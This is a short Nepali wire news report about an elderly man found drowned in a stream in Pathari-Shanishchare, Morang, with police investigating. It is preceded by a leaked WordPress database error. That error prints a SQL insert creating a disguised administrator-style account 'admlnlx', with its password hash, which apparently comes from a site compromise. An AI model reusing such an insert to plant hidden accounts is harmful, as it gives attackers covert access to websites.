WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BX/cClbe9iN7//M6hwUaKoLDqPB8rI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:35:26', '', 'admlnlx', 'admlnlx')
उर्लाबारी (मोरङ), माघ २१ –
मोरङको पथरी– शनिश्चरेमा पानीमा डुबेर आज एक वृद्धको मृत्यु भएको छ ।
मृत्यु हुनेमा पथरी–शनिश्चरे नगरपालिका–२ बस्ने ६२ वर्षीय शेरहाङध्वज लिम्बू रहेको इलाका प्रहरी कार्यालय पथरीका प्रहरी निरीक्षक राजन कार्कीले जानकारी दिनुभयो । लिम्बूको शव घर नजिकै रहेको खोल्साको पानीमा डुबेको अवस्थामा भेटिएको हो । घटनाबारे अनुसन्धान गर्ने कार्य भइरहेको प्रहरीले जनाएको छ ।- रासस